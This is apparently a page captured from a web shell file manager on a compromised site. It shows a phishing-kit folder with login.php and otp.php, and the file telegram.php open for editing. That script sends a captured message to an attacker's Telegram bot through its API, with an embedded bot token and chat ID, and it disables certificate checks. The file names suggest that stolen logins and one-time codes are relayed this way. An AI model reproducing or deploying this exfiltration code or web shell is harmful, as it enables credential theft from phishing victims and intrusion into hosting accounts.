X7ROOT File Manager
Current Path:
/home/tmkt/public_html/kundenions.de/post
home
/
tmkt
/
public_html
/
kundenions.de
/
post
/
📁
..
📄
error_log
(1.09 KB)
📄
login.php
(1.03 KB)
📄
otp.php
(1.03 KB)
📄
telegram.php
(523 B)
📁
upgrades
Editing: telegram.php
<?php global $message; $website="https://api.telegram.org/bot7701506560:AAHtQ9iEMzPkJfKdWlIwJbkyUWrSBuhY1_c"; $chatId=6310926887; $params=[ 'chat_id'=>'6310926887', 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); ?>
Upload File
Create Folder